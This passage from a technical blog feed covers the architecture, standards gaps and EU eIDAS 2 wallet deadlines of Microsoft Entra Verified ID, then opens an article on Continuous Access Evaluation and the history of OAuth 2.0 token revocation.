The same JWT-VC presented to two different verifiers produces two bit-identical signed payloads. The signature itself is a global correlator: any pair of verifiers who collude can match the two presentations to the same holder credential, and a single verifier who sees the holder's presentation twice can match the holder across the two events. SD-JWT VC and mdoc both inherit this property; only signature schemes that re-randomise at presentation time defeat it.

The escape route is a positive construction, not an impossibility result. The Camenisch and Lysyanskaya 2004 paper on signatures from bilinear maps [@cl-paper-iacr] showed how to build anonymous credentials that dodge the constraint: each presentation is a fresh zero-knowledge proof of knowledge of a signature, not a transcript of the signature itself. The CL family (and its BBS descendant) costs presentation latency in the tens to low hundreds of milliseconds and a verifier that needs more than a JOSE library. The payoff is that unlinkability becomes a theorem of the protocol rather than a line in a privacy policy.

Note: If the bytes the verifier checks are deterministic in the issued credential and the disclosed subset of attributes, then two verifiers who see the same disclosure see the same bytes; unlinkability requires the verifier to check something fresh per presentation, which means re-randomising the signature, which JWS does not do.

Concession 3: DNS as the trust root

did:web inherits DNS and the X.509 certificate-authority system as its security base. A registrar suspension can erase any issuer's DID; a certificate-authority mis-issuance can let an attacker publish a competing DID document at the same identifier; a DNS cache poisoning can redirect resolution. The W3C did:web Security and Privacy Considerations state this inheritance directly, naming DNS and TLS as the load-bearing layers [@did-web-spec]. SSI advocates point to this as the single largest concession compared to a ledger-anchored trust root, and they have a point: the two cannot be combined inside one DID document.

DNS presents many of the attack vectors that enable active security and privacy attacks on the did:web method and it's important that implementors address these concerns via proper configuration of DNS. -- W3C `did:web` Method Specification, DNS Security Considerations [@did-web-spec]

Property	2019 vision claim	2026 product reality	Reason for the trade
Permissionless anchoring	ION on Bitcoin	`did:web` (DNS + CA)	Enterprise issuers already had DNS reputation; ION solved a non-problem
Open credential format	JSON-LD Data Integrity	JWT-VC (JWS over JSON)	JOSE library ubiquity; canonicalisation cost
Selective disclosure	BBS or hash-based	None at GA	Format-migration cost not yet paid
Unlinkability across presentations	Re-randomised signatures	None	JWS is a global correlator
Wallet pluralism	Any conformant wallet	Microsoft Authenticator only	UX, support, and security review surface
Offline verifier	Yes, after one key fetch	Yes (for did:web)	Achieved; cached `did.json` is the verifier state

Key idea: The three things JWT-VC cannot do (selective disclosure, unlinkability, ledger-anchored trust) are not bugs in Microsoft's implementation. They are theorems about the format. Any vendor who picked JWT-VC inherited the same three concessions. The gap between the 2019 promise and the 2026 product is a fixed-format trade-off, not a Microsoft engineering shortfall.

Two of the three concessions can be fixed in the format layer. SD-JWT VC and BBS exist. The third cannot be fixed without a ledger anchor or an alternative trust root, and the operational case for that alternative is the one ION lost. The question for the EUDI roadmap is whether Microsoft will adopt the format-layer fixes, and whether the third concession is one Microsoft now considers a feature of the operational model rather than a cost.

9. Open Problems and the EUDI Deadline

On 24 December 2026, every EU Member State must have provisioned at least one European Digital Identity Wallet. Eighteen months later, on 6 December 2027, every regulated private-sector relying party in the EU must accept presentations from those wallets [@eidas-2]. Microsoft Entra Verified ID currently issues neither of the two credential formats the EUDI ARF mandates.

That single regulatory clock is the spine of every open problem the product faces. There are five.

1. Will Microsoft add SD-JWT VC and ISO mdoc issuance to Entra Verified ID?

The "supported standards" page on Microsoft Learn, refreshed in March 2026, lists JWT-VC and is silent on SD-JWT VC and mdoc [@ms-learn-supported]. The "what is new" changelog through May 2026 records no roadmap commitment to add either format [@ms-learn-whatsnew].

Microsoft staff participate in the OpenID Foundation's Digital Credentials Protocols Working Group and in the IETF OAuth Working Group. The standards bridge that would make the integration least painful (the OpenID for Verifiable Credentials High-Assurance Interoperability Profile, HAIP 1.0-02, published January 2025 [@openid-haip]) is published and stable. Microsoft has not publicly signalled it will adopt HAIP. This is the article's load-bearing open question.

The European Digital Identity Wallet, a regulatory product mandated by Regulation (EU) 2024/1183 (eIDAS 2). Each Member State must provision at least one wallet conforming to the EUDI Architecture and Reference Framework, support SD-JWT VC and ISO/IEC 18013-5 mdoc as baseline credential formats, and enrol on the Commission-maintained certified-wallet trust list per CIR 2025/849 [@eidas-2] [@eudi-arf] [@eur-lex-cir-2025-849]. A January 2025 OpenID Foundation profile that pins OpenID4VP, OpenID4VCI, and SIOPv2 to specific configurations for use with SD-JWT VC and ISO mdoc credentials, intended as the standards bridge for EUDI-Wallet-compatible deployments [@openid-haip].

2. Will Microsoft Authenticator open up to third-party wallets?

The EUDI ARF assumes wallet pluralism: any conformant wallet on any platform can present credentials to any conformant verifier [@eudi-arf]. OpenID4VP is wallet-agnostic by design [@openid4vp-final-spec]. The Microsoft Verified ID Request Service currently accepts presentations only from Microsoft Authenticator [@ms-learn-intro]. No public commitment to support third-party wallets has been located in the Microsoft Learn whats-new archive [@ms-learn-whatsnew]. The Condatis-built OIDC bridge that the NHS Digital Staff Passport pilot used to talk to other wallets is the only documented production workaround [@dif-condatis-blog], and the NHS pilot itself was retired in December 2025 [@credentially-nhs-dsp].

3. Selective disclosure inside the current format

Any verifier scenario that needs partial-claim disclosure (age-over-18 verification without a birthdate, role-scoped credentials without an employee ID) has two workarounds under the current Entra Verified ID stack: issue multiple narrow credentials per role (operational blowup; one VC per claim subset), or wait for SD-JWT VC support. The cryptographic question is also the format-layer question: SD-JWT VC delivers selective disclosure but not unlinkability, BBS delivers both [@bbs-draft-10], and the AnonCreds family already ships both today [@anoncreds-spec]. No single ship-now option gives both inside the JOSE stack.

4. Revocation at nation-state scale

W3C VC Status List 2021, in either its Working Draft or its Bitstring Status List Recommendation form, is a bitstring-compressed revocation register that scales comfortably to roughly $10^6$ credentials per list [@vc-bitstring-status]. EU Member-State Person ID populations are $10^7$ or $10^8$ individuals.

Type-3 cryptographic accumulators (the construction documented in the Ursa AnonCreds paper) are the only known scalable revocation mechanism that preserves holder privacy [@ursa-anoncreds] [@anoncreds-spec]. No W3C, IETF, or ISO accumulator-revocation specification has reached working-group final status as of May 2026. The arithmetic suggests that any vendor planning national-scale issuance will need to either shard the bitstring or adopt an accumulator scheme that does not yet have a standardised wire format.

5. Cross-jurisdictional trust frameworks

The EUDI Trust List (per CIR 2025/849 [@eur-lex-cir-2025-849] [@eudi-arf-2-9]), the AAMVA Digital Trust Service [@movemag-mdl] [@aamva-mdl-guidelines], the UK Digital Identity and Attributes Trust Framework [@uk-diatf], and Microsoft's per-tenant issuer trust list each define their own issuer registries; on the survey above, none of the four specifications publishes a cross-framework interoperability bridge at the trust-framework layer as of May 2026. The DIF Trust Establishment Working Group specification carries an "Editor's Draft" status header [@dif-trust-est] and the IETF SPICE Working Group charter does not commit to a final-spec date [@ietf-spice]; neither venue has yet published a convergence timeline. Until then, a verifier in 2026 has to maintain a different trust list per jurisdiction.

gantt title EUDI Wallet vs Entra Verified ID format readiness dateFormat YYYY-MM-DD axisFormat %Y-%m section eIDAS 2 regulation Entry into force :milestone, m1, 2024-05-20, 1d Member State wallet provisioning deadline :milestone, m2, 2026-12-24, 1d Mandatory private-sector acceptance :milestone, m3, 2027-12-06, 1d section Entra Verified ID format JWT-VC GA (no SD-JWT VC, no mdoc) :a1, 2022-08-08, 2025-12-31 Open: SD-JWT VC + mdoc issuance? :crit, a2, 2026-01-01, 2027-12-06 Article 5a of Regulation (EU) 2024/1183 reads, in the operative paragraph: "each Member State shall provide at least one European Digital Identity Wallet within 24 months of the date of entry into force of the implementing acts referred to in paragraph 23 of this Article and in Article 5c(6)." [@eidas-2].

The triggering acts entered into force in late 2024, putting the wallet-provisioning deadline at 24 December 2026 and the 18-month follow-on mandatory-acceptance deadline at 6 December 2027. The Regulation is directly applicable in every Member State without national transposition. A verifier who declines to accept an EUDI Wallet presentation after the second deadline is, by the text of the Regulation, in violation. That is what makes this a deadline and not a roadmap item.

Note: - Plan to accept SD-JWT VC and ISO mdoc presentations via OpenID4VP, not only JWT-VC, by 6 December 2027. - Plan to consume the consolidated EU certified-wallet trust list (CIR 2025/849, machine-readable form) rather than a per-tenant verifier configuration. - Confirm with Microsoft account managers whether Entra Verified ID is targeted to issue EUDI-conformant credentials by the deadline, or only to verify them via a separate code path or vendor.

The architecture of Entra Verified ID has changed twice already. Whether the EUDI deadline forces a third change toward SD-JWT VC and mdoc issuance and third-party wallet support, or whether Microsoft chooses to interoperate only as a verifier (consuming EUDI credentials it does not itself issue), is the open question that defines the next two years of the product.

10. How to Issue and Verify a Credential Today

For all the architectural drama, the day-to-day developer experience is small. The Microsoft Learn quickstart can take a tenant from "no Verified ID configured" to "first issued VC" in about ten minutes, and the working code that an enterprise verifier needs is short enough to fit on one screen.

Tenant setup

Quick Setup, GA since April 2024, is a single admin-portal button that provisions a did:web DID, generates a P-256 signing key, publishes https://<tenant-host>/.well-known/did.json, and posts the DIF Well-Known DID Configuration document that binds the DID back to the host [@ms-learn-whatsnew] [@well-known-did-config]. The fallback for hosts the tenant administers itself is to publish the same two JSON files at the same well-known paths; the resolution algorithm is the one shown in section 5.

Defining a credential type

Each Verifiable Credential type is described by two JSON files in the Verified ID admin portal: a displayContract that controls how the credential renders in Microsoft Authenticator, and a rulesFile that lists the claim names, their types, and how they are sourced from the issuer's identity provider. The claim set is opaque JSON, not a JSON-LD @context graph; the JWT-VC encoding will keep the claims as flat top-level fields inside the vc.credentialSubject object.

Issuance API

The issuer backend calls POST /verifiableCredentials/createIssuanceRequest on the Verified ID Request Service. The response carries an OpenID4VCI credential offer URL the wallet can consume, plus a short numeric PIN the user enters in Authenticator to confirm they are the same person who started the flow on the issuer's web page [@openid4vci-final-spec]. The signing of the JWT-VC itself happens inside Microsoft's service; the issuer's signing key never leaves the tenant's HSM-backed key vault.

Presentation API

The verifier backend calls POST /verifiableCredentials/createPresentationRequest with a presentation_definition describing which credentials to ask for (DIF Presentation Exchange v2.0.0 [@dif-pe-2]) and an idTokenHint describing who the verifier expects on the other side of the wallet. The response is an OpenID4VP request URI rendered as a QR code (cross-device) or a deep link (same-device); Authenticator handles the rest and returns a Verifiable Presentation containing the requested credentials, signed and bound to the verifier's challenge [@openid4vp-final-spec].

{` // Skeleton of the JSON payload an enterprise verifier sends to the // Verified ID Request Service. The service returns an OpenID4VP request URI. const presentationRequest = { authority: 'did:web:verifier.contoso.com', callback: { url: 'https://verifier.contoso.com/api/vc/presentation-callback', state: 'corr-id-12345', headers: { 'api-key': process.env.VC_CALLBACK_API_KEY }, }, registration: { clientName: 'Contoso Hiring Portal' }, includeQRCode: true, requestedCredentials: [ { type: 'WorkplaceCredential', purpose: 'Confirm employment', acceptedIssuers: [ 'did:web:verifications.linkedin.com', 'did:web:hr.contoso-supplier.com', ], configuration: { validation: { allowRevoked: false, validateLinkedDomain: true } }, }, ], };

// POST presentationRequest to: // https://verifiedid.did.msidentity.com/v1.0/verifiableCredentials/createPresentationRequest `}

Cost and rate-limit considerations

Microsoft Learn states that "there are no special licensing requirements to issue verifiable credentials" [@ms-learn-vc-faq]. Face Check is documented as a premium feature that requires either a Microsoft Entra Suite licence or an explicit Face Check Add-on linked to an Azure subscription [@ms-learn-facecheck]. The Verified ID Quick Setup tutorial documents a per-tenant default of two requests per second for combined issuance and verification [@ms-learn-quick-setup]; high-volume issuers should design backoff into the call sites. The LinkedIn Workplace Verification deployment, with its 70-plus founding organizations and millions of LinkedIn members on the holder side, is the worked end-to-end example of what the architecture can sustain in production [@chik-linkedin-2023].

The LinkedIn Workplace Verification cohort at launch in April 2023 included "more than 70 organizations representing millions of LinkedIn members, including companies like Accenture, Avanade, and Microsoft" [@chik-linkedin-2023]. The flow uses Entra Verified ID under the hood to issue a workplace credential to the employee's Microsoft Authenticator wallet and a corresponding LinkedIn "Verifications" badge to the LinkedIn profile.

flowchart LR Iss[Issuer or Verifier Backend] -- "createIssuanceRequest / createPresentationRequest" --> VRS[Verified ID Request Service] VRS -- "QR code or deep link" --> Auth[Microsoft Authenticator] Auth -- "issuance response or VP" --> VRS VRS -- "callback with VC or VP" --> Iss VRS -- "optional Face Check call" --> Face[Azure AI Face Check]

Note: 1. From the Microsoft Entra admin portal, run Quick Setup to provision a did:web DID on a host you control [@ms-learn-whatsnew]. 2. Define a credential type using the Verified ID admin portal's display contract and rules file editors [@ms-learn-supported]. 3. Use the Verifiable Credentials SDK samples in Azure-Samples/active-directory-verifiable-credentials-* to build an issuer and a verifier and exchange a credential with Authenticator [@ms-learn-intro]. 4. If your scenario needs liveness, enable Face Check on the credential type and budget for the per-verification charge [@ms-learn-whatsnew].

The simplicity of this developer experience is the strongest practical evidence that the architectural decisions of 2022 through 2024 were correct. The same simplicity is the constraint that makes the EUDI second pivot architecturally awkward, because doing it "as a developer convenience" is exactly what Microsoft has spent four years optimising for.

11. Frequently Asked Questions

No. The option to select `did:ion` as a trust system was removed from the Microsoft Entra Verified ID admin portal in December 2023, and the only trust system the product supports is `did:web` [@ms-learn-whatsnew]. Microsoft's public ION node was wound down in early 2024. The Sidetree protocol remains a DIF Ratified Specification [@dif-sidetree] and the ION repository remains live on GitHub [@ion-github], but Microsoft does not anchor any production DIDs there. No. Each Verifiable Credential is a JWT-VC signed end-to-end and presented atomically [@ms-learn-supported]. Selective disclosure of individual claims requires a different credential format: SD-JWT VC (hash-based disclosure built on the SD-JWT primitive in RFC 9901 [@rfc-9901]) or BBS (re-randomised signatures [@bbs-draft-10]). Microsoft has not announced support for either inside Entra Verified ID. Not at general availability. Microsoft Authenticator on iOS and Android is the only supported holder wallet for Entra-issued credentials [@ms-learn-intro]. The Verified ID Request Service accepts presentations only from Authenticator. Production workarounds (such as the Condatis Credentials Gateway used by the NHS Digital Staff Passport pilot [@dif-condatis-blog]) bridge other wallets to Microsoft endpoints through an OIDC adapter, but those are integration patterns, not platform features. Partially. The EUDI Wallet requires SD-JWT VC and ISO/IEC 18013-5 mdoc as baseline credential formats [@eudi-arf] [@eidas-2]. Microsoft has not announced a roadmap commitment to *issue* either format from Entra Verified ID. On the verifier side, OpenID4VP is wallet-agnostic by design [@openid4vp-final-spec], so an Entra-resident verifier can in principle accept presentations from an EUDI Wallet provided the wallet sends a format the verifier knows how to parse. The issuance gap is open as of May 2026. The DID method is the same; the trust framework is different. A Microsoft-tenant `did:web` lives at a tenant-owned host (for example, `did:web:contoso.com`) and is trusted only by verifiers that explicitly add the tenant to their accepted-issuer configuration; the trust framework is the verifier's per-tenant allow-list [@ms-learn-intro]. A national-wallet `did:web` issued under an EUDI Member-State scheme lives at a government-controlled host and is trusted by every EU relying party that consumes the consolidated EU certified-wallet list maintained under CIR 2025/849 [@eur-lex-cir-2025-849] [@eudi-arf-2-9]. The cryptography and the resolution algorithm are identical; the political and legal scope of "who is trusted as an issuer" is the part that differs. Only loosely. The trust root is DNS plus the X.509 certificate-authority system; the W3C `did:web` Security Considerations name this inheritance directly, stating that all DNS security considerations apply to the method [@did-web-spec]. There is no central registry of issuers, which is the operational sense in which it is decentralized, but the system is not censorship-resistant against a domain-registrar suspension or a certificate-authority mis-issuance. Face Check is an Azure AI face-matching service that compares a live selfie taken in Microsoft Authenticator at presentation time against a photo claim on the credential. It gives the verifier evidence that the person presenting the credential is the same person to whom it was issued. It went GA on 12 August 2024 [@ms-learn-whatsnew]. Microsoft Learn classifies Face Check as a "premium feature": Microsoft Entra Suite customers get it as part of the Suite, and every other tenant enables it as a Face Check Add-on linked to an Azure subscription [@ms-learn-facecheck]. No. NHS Digital confirmed the retirement of the Digital Staff Passport on 5 December 2025 [@credentially-nhs-dsp], after a four-Trust pilot phase built initially on a Sovrin-anchored architecture and later migrated to `did:web` with Microsoft Entra Verified ID as the issuer engine and a Condatis-built OIDC bridge for wallet pluralism [@condatis-nhs-dsp] [@dif-condatis-blog]. The architecture survived the pilot; the service did not.

12. Reading the Pattern

Three quiet pivots define the seven-year arc. In June 2022, Microsoft added did:web to the supported-trust-system list alongside did:ion [@ms-learn-whatsnew]. In December 2023, Microsoft removed did:ion and left did:web as the only option [@ms-learn-whatsnew]. A third pivot is pending: whether the EUDI Wallet deadline of 24 December 2026 [@eidas-2] forces Microsoft to add SD-JWT VC and ISO mdoc issuance to Entra Verified ID, or whether the product holds the current trade-offs and limits itself to verifier-only interop on the EUDI side.

Each pivot traded an SSI-vision property for an operational property. Permissionless ledger anchoring traded for one HTTPS GET. JSON-LD elegance traded for JOSE ubiquity. Selective disclosure (still pending) may yet trade for cross-jurisdictional regulatory acceptance.

The product team kept the original vocabulary in the marketing copy while the architecture moved underneath it. That is not unique to Microsoft. It is how every long-running platform engineering effort looks from outside the building. The interesting question is which of the original properties the engineering team eventually defended, and which they let go.

What ships in May 2026 is not the 2019 vision. It is also not a betrayal of the vision. It is the part of the vision that an enterprise identity team has so far been able to defend in front of a quarterly engineering review against a finite operations budget.

The two are different things, and they have always been different things. Reading the Entra Verified ID story as a chronicle of failure misses the point; reading it as a chronicle of unconstrained success also misses the point. The honest reading is that decentralized identity, as it exists in production at Microsoft scale, is the intersection of what the 2019 manifesto wanted, what the 2023 customer pipeline would pay for, and what the 2024 standards stack could ship without a research project.

Whether the EUDI deadline forces the third pivot (toward SD-JWT VC, ISO mdoc, and wallet pluralism) or did:web plus JWT-VC plus Microsoft Authenticator turns out to be the local maximum at which decentralized identity actually shipped at scale, is the question the next two years will answer. Both outcomes preserve the workforce-verification use case the product was built for. Only one preserves Microsoft's relevance to consumer and national-identity issuance.

Key idea: The seven-year arc of Microsoft Entra Verified ID is not a story of an architecture that failed. It is a story of an architecture that was systematically downgraded to whatever the next quarter's engineering review would actually approve, with the original vision serving as a north star the team has kept reorienting toward as the operational constraints came into focus.

*May 2019:* "We believe every person needs a decentralized, digital identity they own and control, backed by self-owned identifiers that enable secure, privacy preserving interactions." [@simons-buchner-2019]
*December 2023:* "The option of selecting did:ion as a trust system is removed. The only trust system available is did:web." [@ms-learn-whatsnew]

Both sentences are true. Both are official Microsoft. Reading them as a sequence rather than as a contradiction is what understanding Entra Verified ID actually means.

The 28-Hour Bargain: How Continuous Access Evaluation Made Long-Lived Tokens Safe

noreply@paragmali.com (Parag Mali) — Sat, 30 May 2026 00:00:00 GMT

**Microsoft Entra Continuous Access Evaluation (CAE) lets access tokens safely live up to 28 hours.** It works by maintaining a push-subscription channel between Entra and Microsoft 365 resource providers, so that when a user is disabled, has their password reset, or has MFA enabled, the resource provider rejects the next request with a `401` and a claims challenge -- typically within 15 minutes for critical events, instantly for IP-location changes [@ms-cae-concept]. The same pattern was standardized by the OpenID Foundation on September 2, 2025 as SSF 1.0, CAEP 1.0, and RISC 1.0 Final Specifications [@openid-three-final-specs], opening the door to vendor-neutral cross-SaaS revocation. CAE does **not** solve token theft (use DPoP for that) and does **not** cover Microsoft Defender for Endpoint or Intune as resource providers (they are signal sources into Conditional Access, not CAE consumers).

1. Your Fired Employee Is Still Reading Email

09:00 Tuesday. The administrator disables the account at 09:01. At 09:23, the ex-employee's open Outlook for the Web tab refreshes -- and pulls down new mail. This is not a bug. This is RFC 6749 working exactly as designed. Until Microsoft Entra shipped a fix that took ten years and three standards bodies -- the IETF, the OpenID Foundation, and NIST -- to develop, the access token that user held at 09:00 stayed cryptographically valid until 10:00 at the latest, and there was nothing Conditional Access could do about it [@rfc-6749].

The window has a name now. It did not, for most of cloud identity's history. Microsoft's own documentation calls it "the lag between when conditions change for a user, and when policy changes are enforced" [@ms-cae-concept]. Between sign-in (Conditional Access territory) and the next token refresh (refresh-token territory) sits a stretch of time in which Conditional Access decisions have no enforcement surface. That stretch ranged from 60 minutes to 24 hours, depending on tenant configuration. For every OAuth 2.0 deployment from 2012 onward, this was the security debt the industry carried.

Note: "Microsoft Entra ID" is the rebranded name for what most engineers learned as "Azure Active Directory" or "Azure AD." Microsoft announced the rename in July 2023 [@ms-entra-rename-2023]; the underlying service, tenants, app registrations, and APIs are unchanged. Throughout this article, "Entra" and the older "Azure AD" refer to the same identity platform.

This article explains the engineering pattern that lets a Microsoft 365 tenant do two things that look contradictory at the same time: extend access-token lifetime from 1 hour to up to 28 hours, and revoke a disabled user's session in under 15 minutes [@ms-cae-concept]. The reconciling idea is a near-real-time push channel between the identity provider (Entra) and a small set of cooperating resource providers. When you can revoke a token in minutes rather than waiting for it to expire, expiry stops doing the security work, and the token can live as long as the user actually needs it.

Microsoft Entra's push-subscription channel between the identity provider and cooperating resource providers (Exchange Online, SharePoint Online, Teams, and Microsoft Graph). CAE lets a resource provider revoke an already-issued access token in near-real-time -- up to 15 minutes for critical events, instantly for IP-location changes -- without waiting for the token to expire [@ms-cae-concept].

The trade has a price. The 15-minute critical-event service-level objective is the price the channel pays for fanning out events across hyperscale Microsoft 365 infrastructure. Sub-second revocation is possible -- other vendors demonstrate it at smaller scales -- but at Exchange-Online volume, 15 minutes is the engineering economics. We will earn that number by Section 8.

For now: the OAuth 2.0 designers knew about this gap when they wrote RFC 6749 in 2012. They chose it on purpose. To see why, and to see why the obvious patches all failed, we have to walk back to the moment the trade was made.

2. The Static-Expiry Compromise

In October 2012, Dick Hardt of Microsoft published RFC 6749 -- The OAuth 2.0 Authorization Framework -- as the editor of record for an IETF working group that had spent five years arguing about it [@rfc-6749]. Section 1.4 defines access tokens as carrying "specific scopes and durations of access," but the specification never characterizes them as short-lived. That an access token should be short enough to limit exposure was always convention, not a normative requirement: the closest the RFC comes is Section 1.5's aside that an access token "may have a shorter lifetime and fewer permissions" than the refresh token that renews it. Nothing in the protocol enforces a short lifetime. Nothing in the protocol provides revocation. Nothing in the protocol stops a server from issuing 24-hour bearer tokens that, once minted, stay cryptographically valid until they expire on their own.

This was a deliberate trade. To see why it was rational, remember what came before.

Web Access Management: the model OAuth replaced

The pre-2012 enterprise-identity pattern in which every protected HTTP request synchronously queried a central policy decision point. Strength: instant revocation, because every request consulted authoritative state. Weakness: a chatty bottleneck that did not scale to cloud volumes and could not federate trust across organizations.

Web Access Management dominated enterprise identity from the late 1990s into the early 2010s. Every protected HTTP request to a WAM-fronted application made a synchronous round-trip to a Policy Decision Point. The PDP held authoritative session and policy state. Revoke a user? The next request failed, immediately, because the PDP said no. No token-lifetime window. No gap between policy change and enforcement.

WAM was correct. WAM was also unworkable for the web that was coming. It did not scale: every request was a network hop. It did not federate: cross-organization SaaS meant the PDP could not live inside any one company's network. And it required every protected resource to participate in a single trust domain. By the time enterprises were running cross-organization SaaS at scale, the WAM model had run out of road.

The OAuth 2.0 authors made the opposite trade. Replace the chatty PDP round-trip with a self-contained signed bearer token -- a JWT the resource server validates locally. Validation becomes O(1) cryptographic verification with no round-trip. Throughput scales horizontally. Federation works, because the JWT carries its own attestation of the issuer. Revocation becomes...approximated. By expiry. The token is valid until it isn't, and you trust that the lifetime is short enough.

For a 2012 web of forum logins and consumer mashups, "short enough" was a defensible answer. For a 2020 enterprise running compliance-bound SaaS across thousands of employees, it was not.

The Zero Trust pressure

Two intellectual pressures forced the question. The first came from Google. In December 2014, Rory Ward and Betsy Beyer published BeyondCorp: A New Approach to Enterprise Security in USENIX ;login: [@ward-beyer-2014-beyondcorp].Beyer would later co-author Site Reliability Engineering (O'Reilly, 2016); BeyondCorp came out of the same Google culture of evidence-driven infrastructure engineering. The argument was philosophical: a session is not a one-shot decision at sign-in. It is a time-varying authorization. Trust signals -- device posture, network location, behavioral risk -- change continuously, and the access decision should change with them. BeyondCorp was not a CAE implementation; it predates the term. But it planted the seed that login-time enforcement was not enough.

The second pressure was bureaucratic. In August 2020, NIST published Special Publication 800-207, Zero Trust Architecture, by Scott Rose, Oliver Borchert, Stu Mitchell, and Sean Connelly [@nist-sp-800-207]. SP 800-207 codified the BeyondCorp philosophy as U.S. federal guidance. One sentence made the engineering investment commercially rational: "Authentication and authorization (both subject and device) are discrete functions performed before a session to an enterprise resource is established." A federal mandate for continuous re-evaluation pushed every cloud vendor with U.S. government contracts to find an implementation. The gap RFC 6749 had left was now a procurement problem.

A name for the problem

The third moment named the gap. On February 21, 2019, Atul Tulshibagwale, then an engineer at Google, published Re-thinking federated identity with the Continuous Access Evaluation Protocol on the Google Cloud blog [@tulshibagwale-2019-google-blog]. The post introduced a term -- CAEP -- and a framing: publish-and-subscribe between identity providers and resource providers, as a third option between WAM's per-request chattiness and OAuth's fire-and-forget expiry. We return to Tulshibagwale's actual proposal in Section 5. For now what matters: 2019 was the year the industry got a vocabulary for a problem it had been carrying for seven years.

The OpenID Foundation working group that grew out of Tulshibagwale's proposal was originally chartered as the Shared Signals & Events (SSE) working group. It was renamed Shared Signals in subsequent years, but older industry write-ups from 2020-2022 still use the SSE abbreviation [@idsalliance-2022-11-cae].

gantt title CAE and Shared Signals timeline (2012-2025) dateFormat YYYY-MM axisFormat %Y section IETF standards RFC 6749 OAuth 2.0 :done, a1, 2012-10, 30d RFC 7009 Token Revocation :done, a2, 2013-08, 30d RFC 7662 Token Introspection :done, a3, 2015-10, 30d RFC 8417 SET :done, a4, 2018-07, 30d RFC 8935 SET Push :done, a5, 2020-11, 30d RFC 8936 SET Poll :done, a6, 2020-11, 30d section Zero Trust thinking BeyondCorp paper :done, b1, 2014-12, 30d NIST SP 800-207 Final :done, b2, 2020-08, 30d section CAEP origin and OIDF Tulshibagwale CAEP post :done, c1, 2019-02, 30d OIDF Shared Signals WG :done, c2, 2019-09, 30d SSF 1.0 CAEP 1.0 RISC 1.0 :done, c3, 2025-09, 30d section Microsoft Entra CAE Limited preview Weinert :done, d1, 2020-04, 30d Expanded preview Simons :done, d2, 2020-10, 30d General Availability :done, d3, 2022-01, 30d

The OAuth 2.0 designers traded revocation latency for throughput on purpose [@rfc-6749]. Once that gap proved unacceptable, three obvious patches were tried. None of them worked. To see why none of them worked is to understand the negative space CAE was designed to fill.

3. Three Patches, Three Failures

Between 2013 and the late 2010s, the OAuth community published three patches for RFC 6749's revocation gap. Each was rationally adopted; each was rationally abandoned at hyperscale. This section is the genealogy of those failures, because what each one got wrong defines the shape of the design that finally worked.

Patch 1: RFC 7009 -- the `/revoke` endpoint (August 2013)

In August 2013, Torsten Lodderstedt of Deutsche Telekom, Stefanie Dronia, and Marius Scurtescu of Google published RFC 7009, OAuth 2.0 Token Revocation [@rfc-7009]. The contribution was a standardized HTTP endpoint, /revoke, that a client could POST a token to in order to invalidate it. The mental model is the logout button: when a user signs out, the client tells the authorization server "I'm done with this token, please retire it."

The failure mode is in the threat model. RFC 7009 is client-initiated. The token holder asks for revocation. But the scenario that motivates CAE is precisely the one where the token holder is uncooperative. A fired employee will not POST their access token to /revoke on the way out the door. An attacker who has stolen a token will certainly not. The administrator on the other side cannot use the endpoint either, because they do not possess the bearer token.

Worse, RFC 7009's Implementation Note (Section 3) is candid about self-contained tokens: the only standardized recourse is "some (currently non-standardized) backend interaction between the authorization server and the resource server" when immediate revocation is desired [@rfc-7009]. Read that carefully. The spec admits there is no spec. The JWT in flight at the resource server is cryptographically valid until it expires. The authorization server can mark it revoked in a local database, but the resource server never asks. It validates the signature locally. The revocation event never crosses the wire.

RFC 7009 works for opaque tokens with a token-introspection back-channel. It does not, by itself, solve revocation for self-contained JWT bearers -- which by the mid-2010s were the dominant pattern in the cloud.

Patch 2: RFC 7662 -- the `/introspect` endpoint (October 2015)

Two years later, in October 2015, Justin Richer published RFC 7662, OAuth 2.0 Token Introspection [@rfc-7662]. The mechanism: on every request, the resource server calls a /introspect endpoint on the authorization server with the bearer token. The AS replies with the token's current state. If the token has been revoked, /introspect returns active: false, and the resource server denies the request.

This is correct. It also reintroduces the WAM bottleneck that OAuth was designed to escape.

For an AS serving billions of requests per day -- Microsoft Graph as one example, Google's IdP as another -- making /introspect the per-request critical path turns the authorization server into a synchronous dependency on every API call against every resource server in the estate. Latency adds up. Availability becomes shared. If the AS has a bad five minutes, every resource server has a bad five minutes simultaneously. The architecture OAuth bought with self-contained tokens -- resource server scales independently of AS -- gets traded back for exactly the WAM property that motivated OAuth's existence.

RFC 7662 introspection is alive and well. It remains the right choice for opaque-token systems and on-premises IdPs where the resource server count is small, the per-request latency budget is generous, and the AS is well within capacity. The criticism here is structural and only applies at hyperscale public-cloud volumes. RFC 7662 was not killed by RFC 7009 or by CAE; it is a parallel path that continues to serve a substantial fraction of the deployed OAuth surface.

Patch 3: Make the token life so short revocation does not matter

The third patch was the obvious one. If you cannot revoke a token mid-life, make its life short. Issue access tokens with a minutes-long lifetime, the way early Microsoft experiments did. The revocation window collapses. Problem solved.

Microsoft tried it. The retrospective is unusually candid. On April 21, 2020, Alex Weinert, then Director of Identity Security at Microsoft, published Moving towards real time policy and security enforcement on the Azure Active Directory Identity Blog [@weinert-2020-04-real-time]. (The original lives at post ID 1276933 on Microsoft's tech community; the full body is preserved in Microsoft's Japanese translation on the jpazureid GitHub mirror [@jpazureid-blog-1-japanese].) The post names the failure mode in one sentence:

"We have experimented with the "blunt object" approach of reduced token lifetimes but found they can degrade user experiences and reliability without eliminating risks." -- Alex Weinert, Microsoft, April 21, 2020 [@weinert-2020-04-real-time]

Two things break. First, user experience and reliability. Every short-lifetime boundary forces every active client to round-trip the IdP for a fresh token. For Outlook, Teams, Word Online, OneDrive, and every other client an enterprise user has open at once, that is a wave of token requests per user per cycle. Multiplied by Microsoft 365 active users, the load profile creates real outages. Network blips that would otherwise be invisible surface as failed refreshes, with user-visible re-authentication prompts. Second, it does not eliminate the risk. A minutes-long window is still a window. A fired employee can read or exfiltrate a great deal of email in that window. You have paid the full user-experience cost and still left a non-trivial breach surface.

This was the third failure. The negative space across the three patches defines the shape any real solution has to take: it must be server-initiated (not RFC 7009), it must be push-based rather than per-request poll (not RFC 7662), and it must separate revocation from expiry so the IdP does not pay for every revocation with a refresh-load spike (not the short-lifetime patch). The three failures exhaust the surface of the obvious fix.

Note: Each of the three patches fails for a different reason; together they rule out everything except server-initiated push subscription that decouples revocation from expiry.

If the patches all fail, the next move has to be architectural. The first published statement of that architecture was Atul Tulshibagwale's February 2019 Google blog post -- and the move he proposed is the one Microsoft would ship three years later.

4. Four Generations of Session Enforcement

